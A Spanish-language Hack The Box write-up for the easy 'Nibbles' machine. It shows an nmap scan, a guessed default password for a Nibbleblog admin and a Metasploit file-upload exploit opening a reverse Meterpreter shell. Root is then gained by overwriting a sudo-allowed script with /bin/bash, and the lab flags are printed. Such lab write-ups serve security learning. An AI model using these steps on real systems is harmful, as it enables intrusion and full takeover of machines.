LaCashita!

[HTB] Nibbles

Hoy vamos a hackear la maquina de HTB llamada Nibbles. Esta catalogada como facil.

Video

Enumeration

Para empezar hacemos un nmap para ver que puertos tiene abiertos.


sml@m0nikE:~$ nmap -A -p- 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 15:19 CET
Nmap scan report for 10.10.10.75
Host is up (0.039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.09 seconds

Vemos en el codigo fuente de la pagina web que aparece el siguiente comentario:


/nibbleblog/ directory. Nothing interesting here!

Sabiendo que se tratra del CMS nibbleblog, buscamos algun exploit que pueda servirnos.

Exploitation

Encontramos un exploit que puede servirnos pero que requiere user/password. Si buscamos informacion, veremos que el usuario por defecto es admin, el cual es el que vamos a utilizar, sin embargo la password hemos tenido que "adivinarla", resultando ser nibbles. Sabiendo los credenciales, ya podemos utilizar el exploit.


msf5 > search nibble

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       
Check  Description
   -  ----                                       ---------------  ----       
-----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  
Yes    Nibbleblog File Upload Vulnerability

msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > show options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format 
type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR 
identifier, or hosts file with syntax 'file:'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing 
connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3


msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
targeturi => /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.10.10.75
rhosts => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit

[-] Exploit failed: The following options failed to validate: USERNAME, 
PASSWORD.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
username => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set password nibbles
password => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Sending stage (38288 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.75:47108) at 
2019-11-02 15:30:42 +0100
[+] Deleted image.php
meterpreter > shell
Process 1446 created.
Channel 1 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

user.txt


cd /home
ls
nibbler
cd nibbler
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Dec 10  2017 user.txt
cat user.txt
b02ff32bb332deba49eeaed21152c8d8

Privilege Escalation

En la carpeta de nibbler vemos que hay un fichero .zip llamado personal. Lo descomprimimos.


$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh

Si miramos el codigo vemos que monitor.sh no puede ayudarnos a elevar los privilegios asi que seguimos buscando alguna pista. Usamos el comando sudo -l para ver si con nuestro usuario podemos ejecutar algun comando usando sudo...


$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Vemos que nuestro usuario puede ejecutar como sudo el script monitor.sh que acabamos de descomprimir. Asi que este caso es tan facil como agregar al script una linea para que ejecute bash y con ello deberia bastar para conseguir una shell con privilegios.


$ ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 10 Nov  2 10:57 monitor.sh
$ echo "/bin/bash" > monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:~/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:~/personal/stuff#

root.txt


root@Nibbles:~/personal/stuff# cd /root
root@Nibbles:/root# cat root.txt 
b6d745c0dfb6457c55591efc898ef88c

End

Y con esto ya tendriamos el flag del "user" y el flag de "root".